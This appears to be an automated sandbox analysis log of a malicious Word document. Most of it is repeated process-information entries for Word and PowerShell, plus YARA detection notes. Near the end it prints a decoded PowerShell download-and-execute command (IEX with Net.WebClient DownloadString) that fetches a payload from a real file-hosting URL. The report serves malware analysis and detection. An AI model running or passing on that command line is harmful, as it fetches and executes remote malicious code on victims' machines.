Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5998			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3639			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200

Thread sleep time: -9223372036854770s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000006.00000002.2132433413.00000000049C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000006.00000002.2136944491.0000000006DA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_5144.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5144, type: MEMORYSTR

Encrypted powershell cmdline option found

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: Base64 decoded IEX (New-Object Net.WebClient).DownloadString('https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhj
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: Base64 decoded IEX (New-Object Net.WebClient).DownloadString('https://tmpfiles.org/dl/18712758/rgvsozgu8x.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhj			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
